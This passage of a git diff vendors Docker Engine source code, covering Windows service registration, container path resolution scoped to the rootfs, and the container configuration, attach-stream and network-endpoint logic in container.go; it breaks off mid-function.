ErrorControl: mgr.ErrorNormal, + Dependencies: depends, + DisplayName: "Docker Engine", + } + + // Configure the service to launch with the arguments that were just passed. + args := []string{"--run-service"} + for _, a := range os.Args[1:] { + if a != "--register-service" && a != "--unregister-service" { + args = append(args, a) + } + } + + s, err := m.CreateService(*flServiceName, p, c, args...) 
+ if err != nil { + return err + } + defer s.Close() + + // See http://stackoverflow.com/questions/35151052/how-do-i-configure-failure-actions-of-a-windows-service-written-in-go + const ( + scActionNone = 0 + scActionRestart = 1 + scActionReboot = 2 + scActionRunCommand = 3 + + serviceConfigFailureActions = 2 + ) + + type serviceFailureActions struct { + ResetPeriod uint32 + RebootMsg *uint16 + Command *uint16 + ActionsCount uint32 + Actions uintptr + } + + type scAction struct { + Type uint32 + Delay uint32 + } + t := []scAction{ + {Type: scActionRestart, Delay: uint32(60 * time.Second / time.Millisecond)}, + {Type: scActionRestart, Delay: uint32(60 * time.Second / time.Millisecond)}, + {Type: scActionNone}, + } + lpInfo := serviceFailureActions{ResetPeriod: uint32(24 * time.Hour / time.Second), ActionsCount: uint32(3), Actions: uintptr(unsafe.Pointer(&t[0]))} + err = windows.ChangeServiceConfig2(s.Handle, serviceConfigFailureActions, (*byte)(unsafe.Pointer(&lpInfo))) + if err != nil { + return err + } + + err = eventlog.Install(*flServiceName, p, false, eventlog.Info|eventlog.Warning|eventlog.Error) + if err != nil { + return err + } + + return nil +} + +func unregisterService() error { + m, err := mgr.Connect() + if err != nil { + return err + } + defer m.Disconnect() + + s, err := m.OpenService(*flServiceName) + if err != nil { + return err + } + defer s.Close() + + eventlog.Remove(*flServiceName) + err = s.Delete() + if err != nil { + return err + } + return nil +} + +func initService(daemonCli *DaemonCli) (bool, error) { + if *flUnregisterService { + if *flRegisterService { + return true, errors.New("--register-service and --unregister-service cannot be used together") + } + return true, unregisterService() + } + + if *flRegisterService { + return true, registerService() + } + + if !*flRunService { + return false, nil + } + + interactive, err := svc.IsAnInteractiveSession() + if err != nil { + return false, err + } + + h := &handler{ + tosvc: make(chan bool), 
+ fromsvc: make(chan error), + daemonCli: daemonCli, + } + + var log *eventlog.Log + if !interactive { + log, err = eventlog.Open(*flServiceName) + if err != nil { + return false, err + } + } + + logrus.AddHook(&etwHook{log}) + logrus.SetOutput(ioutil.Discard) + + service = h + go func() { + if interactive { + err = debug.Run(*flServiceName, h) + } else { + err = svc.Run(*flServiceName, h) + } + + h.fromsvc <- err + }() + + // Wait for the first signal from the service handler. + err = <-h.fromsvc + if err != nil { + return false, err + } + return false, nil +} + +func (h *handler) started() error { + // This must be delayed until daemonCli initializes Config.Root + err := initPanicFile(filepath.Join(h.daemonCli.Config.Root, "panic.log")) + if err != nil { + return err + } + + h.tosvc <- false + return nil +} + +func (h *handler) stopped(err error) { + logrus.Debugf("Stopping service: %v", err) + h.tosvc <- err != nil + <-h.fromsvc +} + +func (h *handler) Execute(_ []string, r <-chan svc.ChangeRequest, s chan<- svc.Status) (bool, uint32) { + s <- svc.Status{State: svc.StartPending, Accepts: 0} + // Unblock initService() + h.fromsvc <- nil + + // Wait for initialization to complete. 
+ failed := <-h.tosvc + if failed { + logrus.Debug("Aborting service start due to failure during initialization") + return true, 1 + } + + s <- svc.Status{State: svc.Running, Accepts: svc.AcceptStop | svc.AcceptShutdown | svc.Accepted(windows.SERVICE_ACCEPT_PARAMCHANGE)} + logrus.Debug("Service running") +Loop: + for { + select { + case failed = <-h.tosvc: + break Loop + case c := <-r: + switch c.Cmd { + case svc.Cmd(windows.SERVICE_CONTROL_PARAMCHANGE): + h.daemonCli.reloadConfig() + case svc.Interrogate: + s <- c.CurrentStatus + case svc.Stop, svc.Shutdown: + s <- svc.Status{State: svc.StopPending, Accepts: 0} + h.daemonCli.stop() + } + } + } + + removePanicFile() + if failed { + return true, 1 + } + return false, 0 +} + +func initPanicFile(path string) error { + var err error + panicFile, err = os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0) + if err != nil { + return err + } + + st, err := panicFile.Stat() + if err != nil { + return err + } + + // If there are contents in the file already, move the file out of the way + // and replace it. + if st.Size() > 0 { + panicFile.Close() + os.Rename(path, path+".old") + panicFile, err = os.Create(path) + if err != nil { + return err + } + } + + // Update STD_ERROR_HANDLE to point to the panic file so that Go writes to + // it when it panics. Remember the old stderr to restore it before removing + // the panic file. 
+ sh := syscall.STD_ERROR_HANDLE + h, err := syscall.GetStdHandle(sh) + if err != nil { + return err + } + + oldStderr = h + + r, _, err := setStdHandle.Call(uintptr(sh), uintptr(panicFile.Fd())) + if r == 0 && err != nil { + return err + } + + return nil +} + +func removePanicFile() { + if st, err := panicFile.Stat(); err == nil { + if st.Size() == 0 { + sh := syscall.STD_ERROR_HANDLE + setStdHandle.Call(uintptr(sh), uintptr(oldStderr)) + panicFile.Close() + os.Remove(panicFile.Name()) + } + } +} diff --git a/vendor/github.com/docker/docker/container/archive.go b/vendor/github.com/docker/docker/container/archive.go new file mode 100644 index 0000000000..56e6598b9c --- /dev/null +++ b/vendor/github.com/docker/docker/container/archive.go @@ -0,0 +1,76 @@ +package container + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/system" +) + +// ResolvePath resolves the given path in the container to a resource on the +// host. Returns a resolved path (absolute path to the resource on the host), +// the absolute path to the resource relative to the container's rootfs, and +// an error if the path points to outside the container's rootfs. +func (container *Container) ResolvePath(path string) (resolvedPath, absPath string, err error) { + // Check if a drive letter supplied, it must be the system drive. No-op except on Windows + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + if err != nil { + return "", "", err + } + + // Consider the given path as an absolute path in the container. + absPath = archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + + // Split the absPath into its Directory and Base components. We will + // resolve the dir in the scope of the container then append the base. 
+ dirPath, basePath := filepath.Split(absPath) + + resolvedDirPath, err := container.GetResourcePath(dirPath) + if err != nil { + return "", "", err + } + + // resolvedDirPath will have been cleaned (no trailing path separators) so + // we can manually join it with the base path element. + resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath + + return resolvedPath, absPath, nil +} + +// StatPath is the unexported version of StatPath. Locks and mounts should +// be acquired before calling this method and the given path should be fully +// resolved to a path on the host corresponding to the given absolute path +// inside the container. +func (container *Container) StatPath(resolvedPath, absPath string) (stat *types.ContainerPathStat, err error) { + lstat, err := os.Lstat(resolvedPath) + if err != nil { + return nil, err + } + + var linkTarget string + if lstat.Mode()&os.ModeSymlink != 0 { + // Fully evaluate the symlink in the scope of the container rootfs. + hostPath, err := container.GetResourcePath(absPath) + if err != nil { + return nil, err + } + + linkTarget, err = filepath.Rel(container.BaseFS, hostPath) + if err != nil { + return nil, err + } + + // Make it an absolute path. 
+ linkTarget = filepath.Join(string(filepath.Separator), linkTarget) + } + + return &types.ContainerPathStat{ + Name: filepath.Base(absPath), + Size: lstat.Size(), + Mode: lstat.Mode(), + Mtime: lstat.ModTime(), + LinkTarget: linkTarget, + }, nil +} diff --git a/vendor/github.com/docker/docker/container/container.go b/vendor/github.com/docker/docker/container/container.go new file mode 100644 index 0000000000..fc4fe2717f --- /dev/null +++ b/vendor/github.com/docker/docker/container/container.go @@ -0,0 +1,1103 @@ +package container + +import ( + "encoding/json" + "fmt" + "io" + "net" + "os" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + networktypes "github.com/docker/docker/api/types/network" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/container/stream" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/jsonfilelog" + "github.com/docker/docker/daemon/network" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/restartmanager" + "github.com/docker/docker/runconfig" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/docker/volume" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" + "github.com/docker/libnetwork/types" + agentexec "github.com/docker/swarmkit/agent/exec" + "github.com/opencontainers/runc/libcontainer/label" +) + 
+const configFileName = "config.v2.json" + +const ( + // DefaultStopTimeout is the timeout (in seconds) for the syscall signal used to stop a container. + DefaultStopTimeout = 10 +) + +var ( + errInvalidEndpoint = fmt.Errorf("invalid endpoint while building port map info") + errInvalidNetwork = fmt.Errorf("invalid network settings while building port map info") +) + +// DetachError is special error which returned in case of container detach. +type DetachError struct{} + +func (DetachError) Error() string { + return "detached from container" +} + +// CommonContainer holds the fields for a container which are +// applicable across all platforms supported by the daemon. +type CommonContainer struct { + StreamConfig *stream.Config + // embed for Container to support states directly. + *State `json:"State"` // Needed for Engine API version <= 1.11 + Root string `json:"-"` // Path to the "home" of the container, including metadata. + BaseFS string `json:"-"` // Path to the graphdriver mountpoint + RWLayer layer.RWLayer `json:"-"` + ID string + Created time.Time + Managed bool + Path string + Args []string + Config *containertypes.Config + ImageID image.ID `json:"Image"` + NetworkSettings *network.Settings + LogPath string + Name string + Driver string + // MountLabel contains the options for the 'mount' command + MountLabel string + ProcessLabel string + RestartCount int + HasBeenStartedBefore bool + HasBeenManuallyStopped bool // used for unless-stopped restart policy + MountPoints map[string]*volume.MountPoint + HostConfig *containertypes.HostConfig `json:"-"` // do not serialize the host config in the json, otherwise we'll make the container unportable + ExecCommands *exec.Store `json:"-"` + SecretStore agentexec.SecretGetter `json:"-"` + SecretReferences []*swarmtypes.SecretReference + // logDriver for closing + LogDriver logger.Logger `json:"-"` + LogCopier *logger.Copier `json:"-"` + restartManager restartmanager.RestartManager + attachContext *attachContext +} + 
+// NewBaseContainer creates a new container with its +// basic configuration. +func NewBaseContainer(id, root string) *Container { + return &Container{ + CommonContainer: CommonContainer{ + ID: id, + State: NewState(), + ExecCommands: exec.NewStore(), + Root: root, + MountPoints: make(map[string]*volume.MountPoint), + StreamConfig: stream.NewConfig(), + attachContext: &attachContext{}, + }, + } +} + +// FromDisk loads the container configuration stored in the host. +func (container *Container) FromDisk() error { + pth, err := container.ConfigPath() + if err != nil { + return err + } + + jsonSource, err := os.Open(pth) + if err != nil { + return err + } + defer jsonSource.Close() + + dec := json.NewDecoder(jsonSource) + + // Load container settings + if err := dec.Decode(container); err != nil { + return err + } + + if err := label.ReserveLabel(container.ProcessLabel); err != nil { + return err + } + return container.readHostConfig() +} + +// ToDisk saves the container configuration on disk. +func (container *Container) ToDisk() error { + pth, err := container.ConfigPath() + if err != nil { + return err + } + + jsonSource, err := ioutils.NewAtomicFileWriter(pth, 0644) + if err != nil { + return err + } + defer jsonSource.Close() + + enc := json.NewEncoder(jsonSource) + + // Save container settings + if err := enc.Encode(container); err != nil { + return err + } + + return container.WriteHostConfig() +} + +// ToDiskLocking saves the container configuration on disk in a thread safe way. +func (container *Container) ToDiskLocking() error { + container.Lock() + err := container.ToDisk() + container.Unlock() + return err +} + +// readHostConfig reads the host configuration from disk for the container. +func (container *Container) readHostConfig() error { + container.HostConfig = &containertypes.HostConfig{} + // If the hostconfig file does not exist, do not read it. 
+ // (We still have to initialize container.HostConfig, + // but that's OK, since we just did that above.) + pth, err := container.HostConfigPath() + if err != nil { + return err + } + + f, err := os.Open(pth) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + defer f.Close() + + if err := json.NewDecoder(f).Decode(&container.HostConfig); err != nil { + return err + } + + container.InitDNSHostConfig() + + return nil +} + +// WriteHostConfig saves the host configuration on disk for the container. +func (container *Container) WriteHostConfig() error { + pth, err := container.HostConfigPath() + if err != nil { + return err + } + + f, err := ioutils.NewAtomicFileWriter(pth, 0644) + if err != nil { + return err + } + defer f.Close() + + return json.NewEncoder(f).Encode(&container.HostConfig) +} + +// SetupWorkingDirectory sets up the container's working directory as set in container.Config.WorkingDir +func (container *Container) SetupWorkingDirectory(rootUID, rootGID int) error { + if container.Config.WorkingDir == "" { + return nil + } + + container.Config.WorkingDir = filepath.Clean(container.Config.WorkingDir) + + pth, err := container.GetResourcePath(container.Config.WorkingDir) + if err != nil { + return err + } + + if err := idtools.MkdirAllNewAs(pth, 0755, rootUID, rootGID); err != nil { + pthInfo, err2 := os.Stat(pth) + if err2 == nil && pthInfo != nil && !pthInfo.IsDir() { + return fmt.Errorf("Cannot mkdir: %s is not a directory", container.Config.WorkingDir) + } + + return err + } + + return nil +} + +// GetResourcePath evaluates `path` in the scope of the container's BaseFS, with proper path +// sanitisation. Symlinks are all scoped to the BaseFS of the container, as +// though the container's BaseFS was `/`. +// +// The BaseFS of a container is the host-facing path which is bind-mounted as +// `/` inside the container. 
This method is essentially used to access a +// particular path inside the container as though you were a process in that +// container. +// +// NOTE: The returned path is *only* safely scoped inside the container's BaseFS +// if no component of the returned path changes (such as a component +// symlinking to a different path) between using this method and using the +// path. See symlink.FollowSymlinkInScope for more details. +func (container *Container) GetResourcePath(path string) (string, error) { + // IMPORTANT - These are paths on the OS where the daemon is running, hence + // any filepath operations must be done in an OS agnostic way. + + cleanPath := cleanResourcePath(path) + r, e := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, cleanPath), container.BaseFS) + + // Log this here on the daemon side as there's otherwise no indication apart + // from the error being propagated all the way back to the client. This makes + // debugging significantly easier and clearly indicates the error comes from the daemon. + if e != nil { + logrus.Errorf("Failed to FollowSymlinkInScope BaseFS %s cleanPath %s path %s %s\n", container.BaseFS, cleanPath, path, e) + } + return r, e +} + +// GetRootResourcePath evaluates `path` in the scope of the container's root, with proper path +// sanitisation. Symlinks are all scoped to the root of the container, as +// though the container's root was `/`. +// +// The root of a container is the host-facing configuration metadata directory. +// Only use this method to safely access the container's `container.json` or +// other metadata files. If in doubt, use container.GetResourcePath. +// +// NOTE: The returned path is *only* safely scoped inside the container's root +// if no component of the returned path changes (such as a component +// symlinking to a different path) between using this method and using the +// path. See symlink.FollowSymlinkInScope for more details. 
+func (container *Container) GetRootResourcePath(path string) (string, error) { + // IMPORTANT - These are paths on the OS where the daemon is running, hence + // any filepath operations must be done in an OS agnostic way. + cleanPath := filepath.Join(string(os.PathSeparator), path) + return symlink.FollowSymlinkInScope(filepath.Join(container.Root, cleanPath), container.Root) +} + +// ExitOnNext signals to the monitor that it should not restart the container +// after we send the kill signal. +func (container *Container) ExitOnNext() { + container.RestartManager().Cancel() +} + +// HostConfigPath returns the path to the container's JSON hostconfig +func (container *Container) HostConfigPath() (string, error) { + return container.GetRootResourcePath("hostconfig.json") +} + +// ConfigPath returns the path to the container's JSON config +func (container *Container) ConfigPath() (string, error) { + return container.GetRootResourcePath(configFileName) +} + +// CheckpointDir returns the directory checkpoints are stored in +func (container *Container) CheckpointDir() string { + return filepath.Join(container.Root, "checkpoints") +} + +// StartLogger starts a new logger driver for the container. 
+func (container *Container) StartLogger(cfg containertypes.LogConfig) (logger.Logger, error) { + c, err := logger.GetLogDriver(cfg.Type) + if err != nil { + return nil, fmt.Errorf("Failed to get logging factory: %v", err) + } + ctx := logger.Context{ + Config: cfg.Config, + ContainerID: container.ID, + ContainerName: container.Name, + ContainerEntrypoint: container.Path, + ContainerArgs: container.Args, + ContainerImageID: container.ImageID.String(), + ContainerImageName: container.Config.Image, + ContainerCreated: container.Created, + ContainerEnv: container.Config.Env, + ContainerLabels: container.Config.Labels, + DaemonName: "docker", + } + + // Set logging file for "json-logger" + if cfg.Type == jsonfilelog.Name { + ctx.LogPath, err = container.GetRootResourcePath(fmt.Sprintf("%s-json.log", container.ID)) + if err != nil { + return nil, err + } + } + return c(ctx) +} + +// GetProcessLabel returns the process label for the container. +func (container *Container) GetProcessLabel() string { + // even if we have a process label return "" if we are running + // in privileged mode + if container.HostConfig.Privileged { + return "" + } + return container.ProcessLabel +} + +// GetMountLabel returns the mounting label for the container. +// This label is empty if the container is privileged. +func (container *Container) GetMountLabel() string { + return container.MountLabel +} + +// GetExecIDs returns the list of exec commands running on the container. +func (container *Container) GetExecIDs() []string { + return container.ExecCommands.List() +} + +// Attach connects to the container's TTY, delegating to standard +// streams or websockets depending on the configuration. 
+func (container *Container) Attach(stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { + ctx := container.InitAttachContext() + return AttachStreams(ctx, container.StreamConfig, container.Config.OpenStdin, container.Config.StdinOnce, container.Config.Tty, stdin, stdout, stderr, keys) +} + +// AttachStreams connects streams to a TTY. +// Used by exec too. Should this move somewhere else? +func AttachStreams(ctx context.Context, streamConfig *stream.Config, openStdin, stdinOnce, tty bool, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer, keys []byte) chan error { + var ( + cStdout, cStderr io.ReadCloser + cStdin io.WriteCloser + wg sync.WaitGroup + errors = make(chan error, 3) + ) + + if stdin != nil && openStdin { + cStdin = streamConfig.StdinPipe() + wg.Add(1) + } + + if stdout != nil { + cStdout = streamConfig.StdoutPipe() + wg.Add(1) + } + + if stderr != nil { + cStderr = streamConfig.StderrPipe() + wg.Add(1) + } + + // Connect stdin of container to the http conn. 
+ go func() { + if stdin == nil || !openStdin { + return + } + logrus.Debug("attach: stdin: begin") + + var err error + if tty { + _, err = copyEscapable(cStdin, stdin, keys) + } else { + _, err = io.Copy(cStdin, stdin) + } + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + logrus.Errorf("attach: stdin: %s", err) + errors <- err + } + if stdinOnce && !tty { + cStdin.Close() + } else { + // No matter what, when stdin is closed (io.Copy unblock), close stdout and stderr + if cStdout != nil { + cStdout.Close() + } + if cStderr != nil { + cStderr.Close() + } + } + logrus.Debug("attach: stdin: end") + wg.Done() + }() + + attachStream := func(name string, stream io.Writer, streamPipe io.ReadCloser) { + if stream == nil { + return + } + + logrus.Debugf("attach: %s: begin", name) + _, err := io.Copy(stream, streamPipe) + if err == io.ErrClosedPipe { + err = nil + } + if err != nil { + logrus.Errorf("attach: %s: %v", name, err) + errors <- err + } + // Make sure stdin gets closed + if stdin != nil { + stdin.Close() + } + streamPipe.Close() + logrus.Debugf("attach: %s: end", name) + wg.Done() + } + + go attachStream("stdout", stdout, cStdout) + go attachStream("stderr", stderr, cStderr) + + return promise.Go(func() error { + done := make(chan struct{}) + go func() { + wg.Wait() + close(done) + }() + select { + case <-done: + case <-ctx.Done(): + // close all pipes + if cStdin != nil { + cStdin.Close() + } + if cStdout != nil { + cStdout.Close() + } + if cStderr != nil { + cStderr.Close() + } + <-done + } + close(errors) + for err := range errors { + if err != nil { + return err + } + } + return nil + }) +} + +// Code c/c from io.Copy() modified to handle escape sequence +func copyEscapable(dst io.Writer, src io.ReadCloser, keys []byte) (written int64, err error) { + if len(keys) == 0 { + // Default keys : ctrl-p ctrl-q + keys = []byte{16, 17} + } + buf := make([]byte, 32*1024) + for { + nr, er := src.Read(buf) + if nr > 0 { + // ---- Docker addition + 
preservBuf := []byte{} + for i, key := range keys { + preservBuf = append(preservBuf, buf[0:nr]...) + if nr != 1 || buf[0] != key { + break + } + if i == len(keys)-1 { + src.Close() + return 0, DetachError{} + } + nr, er = src.Read(buf) + } + var nw int + var ew error + if len(preservBuf) > 0 { + nw, ew = dst.Write(preservBuf) + nr = len(preservBuf) + } else { + // ---- End of docker + nw, ew = dst.Write(buf[0:nr]) + } + if nw > 0 { + written += int64(nw) + } + if ew != nil { + err = ew + break + } + if nr != nw { + err = io.ErrShortWrite + break + } + } + if er == io.EOF { + break + } + if er != nil { + err = er + break + } + } + return written, err +} + +// ShouldRestart decides whether the daemon should restart the container or not. +// This is based on the container's restart policy. +func (container *Container) ShouldRestart() bool { + shouldRestart, _, _ := container.RestartManager().ShouldRestart(uint32(container.ExitCode()), container.HasBeenManuallyStopped, container.FinishedAt.Sub(container.StartedAt)) + return shouldRestart +} + +// AddMountPointWithVolume adds a new mount point configured with a volume to the container. 
+func (container *Container) AddMountPointWithVolume(destination string, vol volume.Volume, rw bool) { + container.MountPoints[destination] = &volume.MountPoint{ + Type: mounttypes.TypeVolume, + Name: vol.Name(), + Driver: vol.DriverName(), + Destination: destination, + RW: rw, + Volume: vol, + CopyData: volume.DefaultCopyMode, + } +} + +// UnmountVolumes unmounts all volumes +func (container *Container) UnmountVolumes(volumeEventLog func(name, action string, attributes map[string]string)) error { + var errors []string + for _, volumeMount := range container.MountPoints { + // Check if the mounpoint has an ID, this is currently the best way to tell if it's actually mounted + // TODO(cpuguyh83): there should be a better way to handle this + if volumeMount.Volume != nil && volumeMount.ID != "" { + if err := volumeMount.Volume.Unmount(volumeMount.ID); err != nil { + errors = append(errors, err.Error()) + continue + } + volumeMount.ID = "" + + attributes := map[string]string{ + "driver": volumeMount.Volume.DriverName(), + "container": container.ID, + } + volumeEventLog(volumeMount.Volume.Name(), "unmount", attributes) + } + } + if len(errors) > 0 { + return fmt.Errorf("error while unmounting volumes for container %s: %s", container.ID, strings.Join(errors, "; ")) + } + return nil +} + +// IsDestinationMounted checks whether a path is mounted on the container or not. +func (container *Container) IsDestinationMounted(destination string) bool { + return container.MountPoints[destination] != nil +} + +// StopSignal returns the signal used to stop the container. +func (container *Container) StopSignal() int { + var stopSignal syscall.Signal + if container.Config.StopSignal != "" { + stopSignal, _ = signal.ParseSignal(container.Config.StopSignal) + } + + if int(stopSignal) == 0 { + stopSignal, _ = signal.ParseSignal(signal.DefaultStopSignal) + } + return int(stopSignal) +} + +// StopTimeout returns the timeout (in seconds) used to stop the container. 
+func (container *Container) StopTimeout() int { + if container.Config.StopTimeout != nil { + return *container.Config.StopTimeout + } + return DefaultStopTimeout +} + +// InitDNSHostConfig ensures that the dns fields are never nil. +// New containers don't ever have those fields nil, +// but pre created containers can still have those nil values. +// The non-recommended host configuration in the start api can +// make these fields nil again, this corrects that issue until +// we remove that behavior for good. +// See https://github.com/docker/docker/pull/17779 +// for a more detailed explanation on why we don't want that. +func (container *Container) InitDNSHostConfig() { + container.Lock() + defer container.Unlock() + if container.HostConfig.DNS == nil { + container.HostConfig.DNS = make([]string, 0) + } + + if container.HostConfig.DNSSearch == nil { + container.HostConfig.DNSSearch = make([]string, 0) + } + + if container.HostConfig.DNSOptions == nil { + container.HostConfig.DNSOptions = make([]string, 0) + } +} + +// GetEndpointInNetwork returns the container's endpoint to the provided network. 
+func (container *Container) GetEndpointInNetwork(n libnetwork.Network) (libnetwork.Endpoint, error) { + endpointName := strings.TrimPrefix(container.Name, "/") + return n.EndpointByName(endpointName) +} + +func (container *Container) buildPortMapInfo(ep libnetwork.Endpoint) error { + if ep == nil { + return errInvalidEndpoint + } + + networkSettings := container.NetworkSettings + if networkSettings == nil { + return errInvalidNetwork + } + + if len(networkSettings.Ports) == 0 { + pm, err := getEndpointPortMapInfo(ep) + if err != nil { + return err + } + networkSettings.Ports = pm + } + return nil +} + +func getEndpointPortMapInfo(ep libnetwork.Endpoint) (nat.PortMap, error) { + pm := nat.PortMap{} + driverInfo, err := ep.DriverInfo() + if err != nil { + return pm, err + } + + if driverInfo == nil { + // It is not an error for epInfo to be nil + return pm, nil + } + + if expData, ok := driverInfo[netlabel.ExposedPorts]; ok { + if exposedPorts, ok := expData.([]types.TransportPort); ok { + for _, tp := range exposedPorts { + natPort, err := nat.NewPort(tp.Proto.String(), strconv.Itoa(int(tp.Port))) + if err != nil { + return pm, fmt.Errorf("Error parsing Port value(%v):%v", tp.Port, err) + } + pm[natPort] = nil + } + } + } + + mapData, ok := driverInfo[netlabel.PortMap] + if !ok { + return pm, nil + } + + if portMapping, ok := mapData.([]types.PortBinding); ok { + for _, pp := range portMapping { + natPort, err := nat.NewPort(pp.Proto.String(), strconv.Itoa(int(pp.Port))) + if err != nil { + return pm, err + } + natBndg := nat.PortBinding{HostIP: pp.HostIP.String(), HostPort: strconv.Itoa(int(pp.HostPort))} + pm[natPort] = append(pm[natPort], natBndg) + } + } + + return pm, nil +} + +// GetSandboxPortMapInfo retrieves the current port-mapping programmed for the given sandbox +func GetSandboxPortMapInfo(sb libnetwork.Sandbox) nat.PortMap { + pm := nat.PortMap{} + if sb == nil { + return pm + } + + for _, ep := range sb.Endpoints() { + pm, _ = 
getEndpointPortMapInfo(ep) + if len(pm) > 0 { + break + } + } + return pm +} + +// BuildEndpointInfo sets endpoint-related fields on container.NetworkSettings based on the provided network and endpoint. +func (container *Container) BuildEndpointInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { + if ep == nil { + return errInvalidEndpoint + } + + networkSettings := container.NetworkSettings + if networkSettings == nil { + return errInvalidNetwork + } + + epInfo := ep.Info() + if epInfo == nil { + // It is not an error to get an empty endpoint info + return nil + } + + if _, ok := networkSettings.Networks[n.Name()]; !ok { + networkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: &networktypes.EndpointSettings{}, + } + } + networkSettings.Networks[n.Name()].NetworkID = n.ID() + networkSettings.Networks[n.Name()].EndpointID = ep.ID() + + iface := epInfo.Iface() + if iface == nil { + return nil + } + + if iface.MacAddress() != nil { + networkSettings.Networks[n.Name()].MacAddress = iface.MacAddress().String() + } + + if iface.Address() != nil { + ones, _ := iface.Address().Mask.Size() + networkSettings.Networks[n.Name()].IPAddress = iface.Address().IP.String() + networkSettings.Networks[n.Name()].IPPrefixLen = ones + } + + if iface.AddressIPv6() != nil && iface.AddressIPv6().IP.To16() != nil { + onesv6, _ := iface.AddressIPv6().Mask.Size() + networkSettings.Networks[n.Name()].GlobalIPv6Address = iface.AddressIPv6().IP.String() + networkSettings.Networks[n.Name()].GlobalIPv6PrefixLen = onesv6 + } + + return nil +} + +// UpdateJoinInfo updates network settings when container joins network n with endpoint ep. 
+func (container *Container) UpdateJoinInfo(n libnetwork.Network, ep libnetwork.Endpoint) error { + if err := container.buildPortMapInfo(ep); err != nil { + return err + } + + epInfo := ep.Info() + if epInfo == nil { + // It is not an error to get an empty endpoint info + return nil + } + if epInfo.Gateway() != nil { + container.NetworkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String() + } + if epInfo.GatewayIPv6().To16() != nil { + container.NetworkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String() + } + + return nil +} + +// UpdateSandboxNetworkSettings updates the sandbox ID and Key. +func (container *Container) UpdateSandboxNetworkSettings(sb libnetwork.Sandbox) error { + container.NetworkSettings.SandboxID = sb.ID() + container.NetworkSettings.SandboxKey = sb.Key() + return nil +} + +// BuildJoinOptions builds endpoint Join options from a given network. +func (container *Container) BuildJoinOptions(n libnetwork.Network) ([]libnetwork.EndpointOption, error) { + var joinOptions []libnetwork.EndpointOption + if epConfig, ok := container.NetworkSettings.Networks[n.Name()]; ok { + for _, str := range epConfig.Links { + name, alias, err := runconfigopts.ParseLink(str) + if err != nil { + return nil, err + } + joinOptions = append(joinOptions, libnetwork.CreateOptionAlias(name, alias)) + } + } + return joinOptions, nil +} + +// BuildCreateEndpointOptions builds endpoint options from a given network. 
+func (container *Container) BuildCreateEndpointOptions(n libnetwork.Network, epConfig *networktypes.EndpointSettings, sb libnetwork.Sandbox, daemonDNS []string) ([]libnetwork.EndpointOption, error) { + var ( + bindings = make(nat.PortMap) + pbList []types.PortBinding + exposeList []types.TransportPort + createOptions []libnetwork.EndpointOption + ) + + defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + + if (!container.EnableServiceDiscoveryOnDefaultNetwork() && n.Name() == defaultNetName) || + container.NetworkSettings.IsAnonymousEndpoint { + createOptions = append(createOptions, libnetwork.CreateOptionAnonymous()) + } + + if epConfig != nil { + ipam := epConfig.IPAMConfig + if ipam != nil && (ipam.IPv4Address != "" || ipam.IPv6Address != "" || len(ipam.LinkLocalIPs) > 0) { + var ipList []net.IP + for _, ips := range ipam.LinkLocalIPs { + if ip := net.ParseIP(ips); ip != nil { + ipList = append(ipList, ip) + } + } + createOptions = append(createOptions, + libnetwork.CreateOptionIpam(net.ParseIP(ipam.IPv4Address), net.ParseIP(ipam.IPv6Address), ipList, nil)) + } + + for _, alias := range epConfig.Aliases { + createOptions = append(createOptions, libnetwork.CreateOptionMyAlias(alias)) + } + } + + if container.NetworkSettings.Service != nil { + svcCfg := container.NetworkSettings.Service + + var vip string + if svcCfg.VirtualAddresses[n.ID()] != nil { + vip = svcCfg.VirtualAddresses[n.ID()].IPv4 + } + + var portConfigs []*libnetwork.PortConfig + for _, portConfig := range svcCfg.ExposedPorts { + portConfigs = append(portConfigs, &libnetwork.PortConfig{ + Name: portConfig.Name, + Protocol: libnetwork.PortConfig_Protocol(portConfig.Protocol), + TargetPort: portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + }) + } + + createOptions = append(createOptions, libnetwork.CreateOptionService(svcCfg.Name, svcCfg.ID, net.ParseIP(vip), portConfigs, svcCfg.Aliases[n.ID()])) + } + + if !containertypes.NetworkMode(n.Name()).IsUserDefined() { + 
